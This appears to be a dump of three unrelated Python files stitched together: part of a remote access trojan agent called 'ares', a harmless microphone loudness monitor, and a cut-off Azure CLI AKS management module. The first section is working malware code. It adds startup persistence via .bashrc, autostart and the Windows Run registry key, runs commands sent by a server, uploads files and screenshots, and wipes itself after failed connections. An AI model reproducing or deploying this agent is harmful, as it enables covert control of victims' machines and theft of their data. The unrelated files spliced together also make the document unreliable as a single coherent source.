f.write("\n(if [ $(ps aux|grep " + os.path.basename(sys.executable) + "|wc -l) -lt 2 ]; then " + agent_path + ";fi&)\n")
elif platform.system() == 'Windows':
persist_dir = os.path.join(os.getenv('USERPROFILE'), 'ares')
if not os.path.exists(persist_dir):
os.makedirs(persist_dir)
agent_path = os.path.join(persist_dir, os.path.basename(sys.executable))
shutil.copyfile(sys.executable, agent_path)
cmd = "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v ares /t REG_SZ /d \"%s\"" % agent_path
subprocess.Popen(cmd, shell=True)
self.send_output('[+] Agent installed.')
def clean(self):
""" Uninstalls the agent """
if platform.system() == 'Linux':
persist_dir = self.expand_path('~/.ares')
if os.path.exists(persist_dir):
shutil.rmtree(persist_dir)
desktop_entry = self.expand_path('~/.config/autostart/ares.desktop')
if os.path.exists(desktop_entry):
os.remove(desktop_entry)
os.system("grep -v .ares .bashrc > .bashrc.tmp;mv .bashrc.tmp .bashrc")
elif platform.system() == 'Windows':
persist_dir = os.path.join(os.getenv('USERPROFILE'), 'ares')
cmd = "reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v ares"
subprocess.Popen(cmd, shell=True)
cmd = "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce /f /v ares /t REG_SZ /d \"cmd.exe /c del /s /q %s & rmdir %s\"" % (persist_dir, persist_dir)
subprocess.Popen(cmd, shell=True)
self.send_output('[+] Agent removed successfully.')
def exit(self):
""" Kills the agent """
self.send_output('[+] Exiting... (bye!)')
sys.exit(0)
@threaded
def zip(self, zip_name, to_zip):
""" Zips a folder or file """
try:
zip_name = self.expand_path(zip_name)
to_zip = self.expand_path(to_zip)
if not os.path.exists(to_zip):
self.send_output("[+] No such file or directory: %s" % to_zip)
return
self.send_output("[*] Creating zip archive...")
zip_file = zipfile.ZipFile(zip_name, 'w', zipfile.ZIP_DEFLATED)
if os.path.isdir(to_zip):
relative_path = os.path.dirname(to_zip)
for root, dirs, files in os.walk(to_zip):
for file in files:
zip_file.write(os.path.join(root, file), os.path.join(root, file).replace(relative_path, '', 1))
else:
zip_file.write(to_zip, os.path.basename(to_zip))
zip_file.close()
self.send_output("[+] Archive created: %s" % zip_name)
except Exception as exc:
self.send_output(traceback.format_exc())
@threaded
def screenshot(self):
""" Takes a screenshot and uploads it to the server"""
screenshot = ImageGrab.grab()
tmp_file = tempfile.NamedTemporaryFile()
screenshot_file = tmp_file.name + ".png"
tmp_file.close()
screenshot.save(screenshot_file)
self.upload(screenshot_file)
def help(self):
""" Displays the help """
self.send_output(config.HELP)
def run(self):
""" Main loop """
self.silent = True
if config.PERSIST:
try:
self.persist()
except:
self.log("Failed executing persistence")
self.silent = False
while True:
try:
todo = self.server_hello()
self.update_consecutive_failed_connections(0)
# Something to do ?
if todo:
commandline = todo
self.idle = False
self.last_active = time.time()
self.send_output('$ ' + commandline)
split_cmd = commandline.split(" ")
command = split_cmd[0]
args = []
if len(split_cmd) > 1:
args = split_cmd[1:]
try:
if command == 'cd':
if not args:
self.send_output('usage: cd </path/to/directory>')
else:
self.cd(args[0])
elif command == 'upload':
if not args:
self.send_output('usage: upload <localfile>')
else:
self.upload(args[0],)
elif command == 'download':
if not args:
self.send_output('usage: download <remote_url> <destination>')
else:
if len(args) == 2:
self.download(args[0], args[1])
else:
self.download(args[0])
elif command == 'clean':
self.clean()
elif command == 'persist':
self.persist()
elif command == 'exit':
self.exit()
elif command == 'zip':
if not args or len(args) < 2:
self.send_output('usage: zip <archive_name> <folder>')
else:
self.zip(args[0], " ".join(args[1:]))
elif command == 'python':
if not args:
self.send_output('usage: python <python_file> or python <python_command>')
else:
self.python(" ".join(args))
elif command == 'screenshot':
self.screenshot()
elif command == 'help':
self.help()
else:
self.runcmd(commandline)
except Exception as exc:
self.send_output(traceback.format_exc())
else:
if self.idle:
time.sleep(config.HELLO_INTERVAL)
elif (time.time() - self.last_active) > config.IDLE_TIME:
self.log("Switching to idle mode...")
self.idle = True
else:
time.sleep(0.5)
except Exception as exc:
self.log(traceback.format_exc())
failed_connections = self.get_consecutive_failed_connections()
failed_connections += 1
self.update_consecutive_failed_connections(failed_connections)
self.log("Consecutive failed connections: %d" % failed_connections)
if failed_connections > config.MAX_FAILED_CONNECTIONS:
self.silent = True
self.clean()
self.exit()
time.sleep(config.HELLO_INTERVAL)
def main():
agent = Agent()
agent.run()
if __name__ == "__main__":
main()
|
soundmonitor.py
|
# Python 3.8.2
# Started on 2020-05-14 by Dylan Halladay
""" Program to monitor audio input levels
and react to noises in realtime.
PLEASE READ
This program prioritizes reaction time over
efficient RAM/CPU usage. As such, several
single-task child processes will be spawned
upon execution, each with only one job.
This allows for realtime response to noises
based on their loudness.
SETTINGS
To change mono/stereo, sampling rate, and
record time, change the constants in the
settings section of the file.
The program only accepts 16-bit audio. """
import sys
import pyaudio # I had to use "python -m pipwin install pyaudio" on Windows (version 0.2.11)
import audioop
import queue # Just for exceptions from mp.Queue()
import datetime
import time
import numpy as np # pip install numpy
import multiprocessing as mp
from decimal import Decimal, InvalidOperation
# ========================
# Settings
# ========================
# Mono or stereo mic?
CHANNELS = 1
# Sampling rate of mic in Hz?
RATE = 48000
# RMS quantize level (output precision)
RMS_rounder = Decimal('1')
# dB quantize level (output precision)
dB_rounder = Decimal('01.23')
# Output prefix enabled? True/False
# Content of prefix is determined in prefix() function
enable_prefixes = True
# Desired record time per output in seconds?
# Higher = Less output/sec, may be more accurate, may miss very fast sounds
# Lower = More output/sec, may be less accurate, catches very fast sounds
# (Time required to process sound may make time between outputs vary slightly)
record_time = 0.1
# ========================
# End of settings
# ========================
class Sound(object):
""" Used to give detected sounds a dB value and loudness rating.
Raw attributes are type Decimal, others are type string.
Non-raw attributes are truncated according to settings. """
def __init__(self):
self.visual_string = "Not set" # string
self.raw_RMS = "Not set" # Decimal
self.raw_dB = "Not set" # Decimal
self.RMS = "Not set" # string
self.dB = "Not set" # string
# ========================
# Basic functions
# ========================
def queue_put(queue_name, given):
""" I put the try/except in a function to avoid
typing it several times. """
try:
queue_name.put(given)
except queue.Empty:
print("queue_put: Queue empty!")
except queue.Full:
print("queue_put: Queue full!")
def queue_get(queue_name):
""" I put the try/except in a function to avoid
typing it several times. """
try:
x = queue_name.get()
except queue.Empty:
print("queue_get: Queue empty!")
return None
except queue.Full:
print("queue_get: Queue full!")
return None
return x
def prefix():
""" Only retuns string if prefixes are enabled in settings """
if enable_prefixes:
# Return timestamp in "2020-05-15 HH:MM:SS.xx" format
date_now = datetime.datetime.today().strftime('%Y-%m-%d') # YYYY-MM-DD
time_now = datetime.datetime.today().strftime('%H:%M:%S.%f')[:-4] # HH:MM:SS.xxxxxx --> HH:MM:SS.xx
return date_now + " " + time_now + " - "
else:
return ""
# Audio Monitor Process --> Measure Sound Process --> Rate Sound Process --> Sound Handler Process
# ========================
# Audio Monitor Process
# ========================
def AudioMonitorProcess(MeasureSoundQueue):
""" Watch audio stream, get chunk.
('chunk' means a group of individual audio samples/frames)
Put chunk in MeasureSoundQueue. """
# Calculate chunk length based on settings
CHUNK_LENGTH = int(RATE * record_time)
# Open audio input stream with PyAudio
print("Opening audio stream...")
audio = pyaudio.PyAudio()
stream = audio.open(format=pyaudio.paInt16, channels=CHANNELS, rate=RATE, input=True, frames_per_buffer=CHUNK_LENGTH)
# Capture stream
# docs: read(num_frames, exception_on_overflow=True)
while True:
# Add try/except here!
queue_put(MeasureSoundQueue, stream.read(CHUNK_LENGTH, exception_on_overflow=True))
# ========================
# Measure Sound Process
# ========================
# Store .attributes as strings!
def MeasureSoundProcess(MeasureSoundQueue, RateSoundQueue):
""" Get RMS of chunk, convert RMS to dB.
Create Sound object with .dB and .RMS.
Put Sound object in RateSoundQueue. """
y = Sound()
y.visual_string = ""
while True:
x = Sound()
a = queue_get(MeasureSoundQueue)
if x != y:
x.raw_RMS = Decimal(audioop.rms(a, 2)) # 2 refers to bit depth of audio stream IN BYTES
x.raw_dB = Decimal('20') * x.raw_RMS.log10()
# How many bars to display?
try:
visuals_count = (x.raw_dB * Decimal('0.1'))**Decimal('2')
x.visual_string = "|" * int(visuals_count)
except (InvalidOperation, OverflowError) as e:
x.visual_string = y.visual_string
# See class Sound() for info on attrs
skip = False
try:
x.RMS = str(x.raw_RMS.quantize(RMS_rounder)).zfill(5)
x.dB = str(x.raw_dB.quantize(dB_rounder)).zfill(4)
except InvalidOperation:
skip = True
if not skip: queue_put(RateSoundQueue, x)
y = x
# ========================
# Rate Sound Process
# ========================
def RateSoundProcess(RateSoundQueue, ZeroQueue, AmbientQueue, QuietQueue, ModerateQueue, LoudQueue, ExtremeQueue):
""" Take Sound object from RateSoundQueue.
Assign Sound object to queue based on rating:
[zero, ambient, quiet, moderate, loud, extreme]
Put object in correct queue based on loudness rating. """
# -Infinity to next are zero
AmbientLevel = Decimal('0.05') # Here to next are ambient
QuietLevel = Decimal('30.0') # Here to next are quiet
ModerateLevel = Decimal('45.0') # Here to next are moderate
LoudLevel = Decimal('75.0') # Here to next are loud
ExtremeLevel = Decimal('82.0') # Here and up are extreme
y = None
while True:
x = queue_get(RateSoundQueue)
if x != y:
if x.raw_dB < AmbientLevel: queue_put(ZeroQueue, x)
if x.raw_dB >= AmbientLevel and x.raw_dB < QuietLevel: queue_put(AmbientQueue, x)
if x.raw_dB >= QuietLevel and x.raw_dB < ModerateLevel: queue_put(QuietQueue, x)
if x.raw_dB >= ModerateLevel and x.raw_dB < LoudLevel: queue_put(ModerateQueue, x)
if x.raw_dB >= LoudLevel and x.raw_dB < ExtremeLevel: queue_put(LoudQueue, x)
if x.raw_dB >= ExtremeLevel: queue_put(ExtremeQueue, x)
y = x
# ========================
# Sound Handler Processes
# ========================
def ZeroSoundHandlerProcess(ZeroQueue):
""" Display text based on recieved Sound object """
y = Sound() # Dummy Sound object, see bottom of loop
y.dB = ""
while True:
x = queue_get(ZeroQueue)
if x is not None and x.dB != y.dB:
# If we got a sound and it's not the same
# volume as the last sound
print(prefix() + x.RMS + " RMS - " + x.dB + " dB - Zero - " + x.visual_string)
y = x
def AmbientSoundHandlerProcess(AmbientQueue):
""" Display text based on recieved Sound object """
y = Sound() # Dummy Sound object, see bottom of loop
y.dB = ""
while True:
x = queue_get(AmbientQueue)
if x is not None and x.dB != y.dB:
# If we got a sound and it's not the same
# volume as the last sound
print(prefix() + x.RMS + " RMS - " + x.dB + " dB - Ambient - " + x.visual_string)
y = x
def QuietSoundHandlerProcess(QuietQueue):
""" Display text based on recieved Sound object """
y = Sound() # Dummy Sound object, see bottom of loop
y.dB = ""
while True:
x = queue_get(QuietQueue)
if x is not None and x.dB != y.dB:
# If we got a sound and it's not the same
# volume as the last sound
print(prefix() + x.RMS + " RMS - " + x.dB + " dB - Quiet - " + x.visual_string)
y = x
def ModerateSoundHandlerProcess(ModerateQueue):
""" Display text based on recieved Sound object """
y = Sound() # Dummy Sound object, see bottom of loop
y.dB = ""
while True:
x = queue_get(ModerateQueue)
if x is not None and x.dB != y.dB:
# If we got a sound and it's not the same
# volume as the last sound
print(prefix() + x.RMS + " RMS - " + x.dB + " dB - Moderate - " + x.visual_string)
y = x
def LoudSoundHandlerProcess(LoudQueue):
""" Display text based on recieved Sound object """
y = Sound() # Dummy Sound object, see bottom of loop
y.dB = ""
while True:
x = queue_get(LoudQueue)
if x is not None and x.dB != y.dB:
# If we got a sound and it's not the same
# volume as the last sound
print(prefix() + x.RMS + " RMS - " + x.dB + " dB - Loud - " + x.visual_string)
y = x
def ExtremeSoundHandlerProcess(ExtremeQueue):
""" Display text based on recieved Sound object """
y = Sound() # Dummy Sound object, see bottom of loop
y.dB = ""
while True:
x = queue_get(ExtremeQueue)
if x is not None and x.dB != y.dB:
# If we got a sound and it's not the same
# volume as the last sound
print(prefix() + x.RMS + " RMS - " + x.dB + " dB - Extreme - " + x.visual_string)
y = x
# Audio Monitor Process --> Measure Sound Process --> Rate Sound Process --> Sound Handler Process
def main():
print("Please read my docs! :)")
# Create Queues
print("Creating queues...")
MeasureSoundQueue = mp.Queue()
RateSoundQueue = mp.Queue()
ZeroQueue = mp.Queue()
AmbientQueue = mp.Queue()
QuietQueue = mp.Queue()
ModerateQueue = mp.Queue()
LoudQueue = mp.Queue()
ExtremeQueue = mp.Queue()
# Create process objects
print("Creating process objects...")
AudioMonitorProcessObj = mp.Process(target=AudioMonitorProcess, args=(MeasureSoundQueue,), name="Audio Monitor Process")
MeasureSoundProcessObj = mp.Process(target=MeasureSoundProcess, args=(MeasureSoundQueue, RateSoundQueue,), name="Measure Sound Process")
RateSoundProcessObj = mp.Process(target=RateSoundProcess, args=(RateSoundQueue, ZeroQueue, AmbientQueue, QuietQueue, ModerateQueue, LoudQueue, ExtremeQueue), name="Rate Sound Process")
ZeroSoundHandlerProcessObj = mp.Process(target=ZeroSoundHandlerProcess, args=(ZeroQueue,), name="Zero Sound Handler Process")
AmbientSoundHandlerProcessObj = mp.Process(target=AmbientSoundHandlerProcess, args=(AmbientQueue,), name="Ambient Sound Handler Process")
QuietSoundHandlerProcessObj = mp.Process(target=QuietSoundHandlerProcess, args=(QuietQueue,), name="Quiet Sound Handler Process")
ModerateSoundHandlerProcessObj = mp.Process(target=ModerateSoundHandlerProcess, args=(ModerateQueue,), name="Moderate Sound Handler Process")
LoudSoundHandlerProcessObj = mp.Process(target=LoudSoundHandlerProcess, args=(LoudQueue,), name="Loud Sound Handler Process")
ExtremeSoundHandlerProcessObj = mp.Process(target=ExtremeSoundHandlerProcess, args=(ExtremeQueue,), name="Extreme Sound Handler Process")
# Start processes in order
print("Starting processes...")
AudioMonitorProcessObj.start()
MeasureSoundProcessObj.start()
RateSoundProcessObj.start()
ZeroSoundHandlerProcessObj.start()
AmbientSoundHandlerProcessObj.start()
QuietSoundHandlerProcessObj.start()
ModerateSoundHandlerProcessObj.start()
LoudSoundHandlerProcessObj.start()
ExtremeSoundHandlerProcessObj.start()
if __name__ == '__main__':
main()
|
custom.py
|
# pylint: disable=too-many-lines
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from __future__ import print_function
import binascii
import datetime
import errno
import io
import json
import os
import os.path
import platform
import re
import ssl
import stat
import subprocess
import sys
import tempfile
import threading
import time
import uuid
import base64
import webbrowser
import zipfile
from distutils.version import StrictVersion
from math import isnan
from six.moves.urllib.request import urlopen # pylint: disable=import-error
from six.moves.urllib.error import URLError # pylint: disable=import-error
import requests
from knack.log import get_logger
from knack.util import CLIError
from knack.prompting import prompt_pass, NoTTYException
import yaml # pylint: disable=import-error
from dateutil.relativedelta import relativedelta # pylint: disable=import-error
from dateutil.parser import parse # pylint: disable=import-error
from msrestazure.azure_exceptions import CloudError
import colorama # pylint: disable=import-error
from tabulate import tabulate # pylint: disable=import-error
from azure.cli.core.api import get_config_dir
from azure.cli.core.commands.client_factory import get_mgmt_service_client, get_subscription_id
from azure.cli.core.keys import is_valid_ssh_rsa_public_key
from azure.cli.core.util import get_file_json, in_cloud_console, shell_safe_json_parse, truncate_text, sdk_no_wait
from azure.cli.core.commands import LongRunningOperation
from azure.cli.core._profile import Profile
from azure.graphrbac.models import (ApplicationCreateParameters,
PasswordCredential,
KeyCredential,
ServicePrincipalCreateParameters,
GetObjectsParameters)
from .vendored_sdks.azure_mgmt_preview_aks.v2021_03_01.models import (ContainerServiceLinuxProfile,
ManagedClusterWindowsProfile,
ContainerServiceNetworkProfile,
ManagedClusterServicePrincipalProfile,
ContainerServiceSshConfiguration,
MaintenanceConfiguration,
TimeInWeek,
TimeSpan,
ContainerServiceSshPublicKey,
ManagedCluster,
ManagedClusterAADProfile,
ManagedClusterAddonProfile,
ManagedClusterAgentPoolProfile,
AgentPool,
AgentPoolUpgradeSettings,
ContainerServiceStorageProfileTypes,
ManagedClusterIdentity,
ManagedClusterAPIServerAccessProfile,
ManagedClusterSKU,
ManagedClusterIdentityUserAssignedIdentitiesValue,
ManagedClusterAutoUpgradeProfile,
KubeletConfig,
LinuxOSConfig,
SysctlConfig,
ManagedClusterPodIdentityProfile,
ManagedClusterPodIdentity,
ManagedClusterPodIdentityException,
UserAssignedIdentity,
RunCommandRequest,
ManagedClusterPropertiesIdentityProfileValue)
from ._client_factory import cf_resource_groups
from ._client_factory import get_auth_management_client
from ._client_factory import get_graph_rbac_management_client
from ._client_factory import get_msi_client
from ._client_factory import cf_resources
from ._client_factory import get_resource_by_name
from ._client_factory import cf_container_registry_service
from ._client_factory import cf_storage
from ._client_factory import cf_agent_pools
from ._helpers import (_populate_api_server_access_profile, _set_vm_set_type,
_set_outbound_type, _parse_comma_separated_list,
_trim_fqdn_name_containing_hcp)
from ._loadbalancer import (set_load_balancer_sku, is_load_balancer_profile_provided,
update_load_balancer_profile, create_load_balancer_profile)
from ._consts import CONST_HTTP_APPLICATION_ROUTING_ADDON_NAME
from ._consts import CONST_MONITORING_ADDON_NAME
from ._consts import CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID
from ._consts import CONST_VIRTUAL_NODE_ADDON_NAME
from ._consts import CONST_VIRTUAL_NODE_SUBNET_NAME
from ._consts import CONST_AZURE_POLICY_ADDON_NAME
from ._consts import CONST_KUBE_DASHBOARD_ADDON_NAME
from ._consts import CONST_INGRESS_APPGW_ADDON_NAME
from ._consts import CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID, CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME
from ._consts import CONST_INGRESS_APPGW_SUBNET_CIDR, CONST_INGRESS_APPGW_SUBNET_ID
from ._consts import CONST_INGRESS_APPGW_WATCH_NAMESPACE
from ._consts import CONST_SCALE_SET_PRIORITY_REGULAR, CONST_SCALE_SET_PRIORITY_SPOT, CONST_SPOT_EVICTION_POLICY_DELETE
from ._consts import CONST_CONFCOM_ADDON_NAME, CONST_ACC_SGX_QUOTE_HELPER_ENABLED
from ._consts import CONST_OPEN_SERVICE_MESH_ADDON_NAME
from ._consts import CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME, CONST_SECRET_ROTATION_ENABLED
from ._consts import CONST_AZURE_DEFENDER_ADDON_NAME, CONST_AZURE_DEFENDER_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID
from ._consts import CONST_MANAGED_IDENTITY_OPERATOR_ROLE, CONST_MANAGED_IDENTITY_OPERATOR_ROLE_ID
from ._consts import ADDONS
from .maintenanceconfiguration import aks_maintenanceconfiguration_update_internal
from ._consts import CONST_PRIVATE_DNS_ZONE_SYSTEM, CONST_PRIVATE_DNS_ZONE_NONE
logger = get_logger(__name__)
def which(binary):
path_var = os.getenv('PATH')
if platform.system() == 'Windows':
binary = binary + '.exe'
parts = path_var.split(';')
else:
parts = path_var.split(':')
for part in parts:
bin_path = os.path.join(part, binary)
if os.path.exists(bin_path) and os.path.isfile(bin_path) and os.access(bin_path, os.X_OK):
return bin_path
return None
def wait_then_open(url):
"""
Waits for a bit then opens a URL. Useful for waiting for a proxy to come up, and then open the URL.
"""
for _ in range(1, 10):
try:
urlopen(url, context=_ssl_context())
except URLError:
time.sleep(1)
break
webbrowser.open_new_tab(url)
def wait_then_open_async(url):
"""
Spawns a thread that waits for a bit then opens a URL.
"""
t = threading.Thread(target=wait_then_open, args=({url}))
t.daemon = True
t.start()
def _ssl_context():
if sys.version_info < (3, 4) or (in_cloud_console() and platform.system() == 'Windows'):
try:
# added in python 2.7.13 and 3.6
return ssl.SSLContext(ssl.PROTOCOL_TLS)
except AttributeError:
return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
return ssl.create_default_context()
def _build_service_principal(rbac_client, cli_ctx, name, url, client_secret):
# use get_progress_controller
hook = cli_ctx.get_progress_controller(True)
hook.add(messsage='Creating service principal', value=0, total_val=1.0)
logger.info('Creating service principal')
# always create application with 5 years expiration
start_date = datetime.datetime.utcnow()
end_date = start_date + relativedelta(years=5)
result = create_application(rbac_client.applications, name, url, [url], password=client_secret,
start_date=start_date, end_date=end_date)
service_principal = result.app_id # pylint: disable=no-member
for x in range(0, 10):
hook.add(message='Creating service principal',
value=0.1 * x, total_val=1.0)
try:
create_service_principal(
cli_ctx, service_principal, rbac_client=rbac_client)
break
# TODO figure out what exception AAD throws here sometimes.
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
time.sleep(2 + 2 * x)
else:
return False
hook.add(message='Finished service principal creation',
value=1.0, total_val=1.0)
logger.info('Finished service principal creation')
return service_principal
def _add_role_assignment(cli_ctx, role, service_principal_msi_id, is_service_principal=True, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to propagate',
value=0, total_val=1.0)
logger.info('Waiting for AAD role to propagate')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to propagate',
value=0.1 * x, total_val=1.0)
try:
# TODO: break this out into a shared utility library
create_role_assignment(
cli_ctx, role, service_principal_msi_id, is_service_principal, scope=scope)
break
except CloudError as ex:
if ex.message == 'The role assignment already exists.':
break
logger.info(ex.message)
except: # pylint: disable=bare-except
pass
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role propagation done', value=1.0, total_val=1.0)
logger.info('AAD role propagation done')
return True
def _delete_role_assignments(cli_ctx, role, service_principal, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to delete', value=0, total_val=1.0)
logger.info('Waiting for AAD role to delete')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to delete',
value=0.1 * x, total_val=1.0)
try:
delete_role_assignments(cli_ctx,
role=role,
assignee=service_principal,
scope=scope)
break
except CLIError as ex:
raise ex
except CloudError as ex:
logger.info(ex)
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role deletion done', value=1.0, total_val=1.0)
logger.info('AAD role deletion done')
return True
def _get_default_dns_prefix(name, resource_group_name, subscription_id):
# Use subscription id to provide uniqueness and prevent DNS name clashes
name_part = re.sub('[^A-Za-z0-9-]', '', name)[0:10]
if not name_part[0].isalpha():
name_part = (str('a') + name_part)[0:10]
resource_group_part = re.sub(
'[^A-Za-z0-9-]', '', resource_group_name)[0:16]
return '{}-{}-{}'.format(name_part, resource_group_part, subscription_id[0:6])
# pylint: disable=too-many-locals
def store_acs_service_principal(subscription_id, client_secret, service_principal,
file_name='acsServicePrincipal.json'):
obj = {}
if client_secret:
obj['client_secret'] = client_secret
if service_principal:
obj['service_principal'] = service_principal
config_path = os.path.join(get_config_dir(), file_name)
full_config = load_service_principals(config_path=config_path)
if not full_config:
full_config = {}
full_config[subscription_id] = obj
with os.fdopen(os.open(config_path, os.O_RDWR | os.O_CREAT | os.O_TRUNC, 0o600),
'w+') as spFile:
json.dump(full_config, spFile)
def load_acs_service_principal(subscription_id, file_name='acsServicePrincipal.json'):
config_path = os.path.join(get_config_dir(), file_name)
config = load_service_principals(config_path)
if not config:
return None
return config.get(subscription_id)
def load_service_principals(config_path):
if not os.path.exists(config_path):
return None
fd = os.open(config_path, os.O_RDONLY)
try:
with os.fdopen(fd) as f:
return shell_safe_json_parse(f.read())
except: # pylint: disable=bare-except
return None
def _invoke_deployment(cmd, resource_group_name, deployment_name, template, parameters, validate, no_wait,
subscription_id=None):
from azure.cli.core.profiles import ResourceType
DeploymentProperties = cmd.get_models(
'DeploymentProperties', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
properties = DeploymentProperties(
template=template, parameters=parameters, mode='incremental')
smc = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES,
subscription_id=subscription_id).deployments
if validate:
logger.info('==== BEGIN TEMPLATE ====')
logger.info(json.dumps(template, indent=2))
logger.info('==== END TEMPLATE ====')
Deployment = cmd.get_models('Deployment', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
deployment = Deployment(properties=properties)
if validate:
if cmd.supported_api_version(min_api='2019-10-01', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES):
validation_poller = smc.begin_validate(resource_group_name, deployment_name, deployment)
return LongRunningOperation(cmd.cli_ctx)(validation_poller)
else:
return smc.validate(resource_group_name, deployment_name, deployment)
return sdk_no_wait(no_wait, smc.begin_create_or_update, resource_group_name, deployment_name, deployment)
def create_application(client, display_name, homepage, identifier_uris,
available_to_other_tenants=False, password=None, reply_urls=None,
key_value=None, key_type=None, key_usage=None, start_date=None,
end_date=None):
from azure.graphrbac.models import GraphErrorException
password_creds, key_creds = _build_application_creds(password=password, key_value=key_value, key_type=key_type,
key_usage=key_usage, start_date=start_date, end_date=end_date)
app_create_param = ApplicationCreateParameters(available_to_other_tenants=available_to_other_tenants,
display_name=display_name,
identifier_uris=identifier_uris,
homepage=homepage,
reply_urls=reply_urls,
key_credentials=key_creds,
password_credentials=password_creds)
try:
return client.create(app_create_param)
except GraphErrorException as ex:
if 'insufficient privileges' in str(ex).lower():
link = 'https://docs.microsoft.com/azure/azure-resource-manager/resource-group-create-service-principal-portal' # pylint: disable=line-too-long
raise CLIError("Directory permission is needed for the current user to register the application. "
"For how to configure, please refer '{}'. Original error: {}".format(link, ex))
raise
def _build_application_creds(password=None, key_value=None, key_type=None,
key_usage=None, start_date=None, end_date=None):
if password and key_value:
raise CLIError(
'specify either --password or --key-value, but not both.')
if not start_date:
start_date = datetime.datetime.utcnow()
elif isinstance(start_date, str):
start_date = parse(start_date)
if not end_date:
end_date = start_date + relativedelta(years=1)
elif isinstance(end_date, str):
end_date = parse(end_date)
key_type = key_type or 'AsymmetricX509Cert'
key_usage = key_usage or 'Verify'
password_creds = None
key_creds = None
if password:
password_creds = [PasswordCredential(start_date=start_date, end_date=end_date,
key_id=str(uuid.uuid4()), value=password)]
elif key_value:
key_creds = [KeyCredential(start_date=start_date, end_date=end_date, value=key_value,
key_id=str(uuid.uuid4()), usage=key_usage, type=key_type)]
return (password_creds, key_creds)
def create_service_principal(cli_ctx, identifier, resolve_app=True, rbac_client=None):
if rbac_client is None:
rbac_client = get_graph_rbac_management_client(cli_ctx)
if resolve_app:
try:
uuid.UUID(identifier)
result = list(rbac_client.applications.list(
filter="appId eq '{}'".format(identifier)))
except ValueError:
result = list(rbac_client.applications.list(
filter="identifierUris/any(s:s eq '{}')".format(identifier)))
if not result: # assume we get an object id
result = [rbac_client.applications.get(identifier)]
app_id = result[0].app_id
else:
app_id = identifier
return rbac_client.service_principals.create(ServicePrincipalCreateParameters(app_id=app_id, account_enabled=True))
def create_role_assignment(cli_ctx, role, assignee, is_service_principal, resource_group_name=None, scope=None):
return _create_role_assignment(cli_ctx,
role, assignee, resource_group_name,
scope, resolve_assignee=is_service_principal)
def _create_role_assignment(cli_ctx, role, assignee,
resource_group_name=None, scope=None, resolve_assignee=True):
from azure.cli.core.profiles import ResourceType, get_sdk
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
scope = _build_role_scope(
resource_group_name, scope, assignments_client.config.subscription_id)
# XXX: if role is uuid, this function's output cannot be used as role assignment defintion id
# ref: https://github.com/Azure/azure-cli/issues/2458
role_id = _resolve_role_id(role, scope, definitions_client)
# If the cluster has service principal resolve the service principal client id to get the object id,
# if not use MSI object id.
object_id = _resolve_object_id(
cli_ctx, assignee) if resolve_assignee else assignee
RoleAssignmentCreateParameters = get_sdk(cli_ctx, ResourceType.MGMT_AUTHORIZATION,
'RoleAssignmentCreateParameters', mod='models',
operation_group='role_assignments')
parameters = RoleAssignmentCreateParameters(
role_definition_id=role_id, principal_id=object_id)
assignment_name = uuid.uuid4()
custom_headers = None
return assignments_client.create(scope, assignment_name, parameters, custom_headers=custom_headers)
def delete_role_assignments(cli_ctx, ids=None, assignee=None, role=None, resource_group_name=None,
scope=None, include_inherited=False, yes=None):
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
ids = ids or []
if ids:
if assignee or role or resource_group_name or scope or include_inherited:
raise CLIError(
'When assignment ids are used, other parameter values are not required')
for i in ids:
assignments_client.delete_by_id(i)
return
if not any([ids, assignee, role, resource_group_name, scope, assignee, yes]):
from knack.prompting import prompt_y_n
msg = 'This will delete all role assignments under the subscription. Are you sure?'
if not prompt_y_n(msg, default="n"):
return
scope = _build_role_scope(resource_group_name, scope,
assignments_client.config.subscription_id)
assignments = _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited,
include_groups=False)
if assignments:
for a in assignments:
assignments_client.delete_by_id(a.id)
def _delete_role_assignments(cli_ctx, role, service_principal, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to delete', value=0, total_val=1.0)
logger.info('Waiting for AAD role to delete')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to delete',
value=0.1 * x, total_val=1.0)
try:
delete_role_assignments(cli_ctx,
role=role,
assignee=service_principal,
scope=scope)
break
except CLIError as ex:
raise ex
except CloudError as ex:
logger.info(ex)
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role deletion done', value=1.0, total_val=1.0)
logger.info('AAD role deletion done')
return True
def _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited, include_groups):
assignee_object_id = None
if assignee:
assignee_object_id = _resolve_object_id(cli_ctx, assignee)
# always use "scope" if provided, so we can get assignments beyond subscription e.g. management groups
if scope:
assignments = list(assignments_client.list_for_scope(
scope=scope, filter='atScope()'))
elif assignee_object_id:
if include_groups:
f = "assignedTo('{}')".format(assignee_object_id)
else:
f = "principalId eq '{}'".format(assignee_object_id)
assignments = list(assignments_client.list(filter=f))
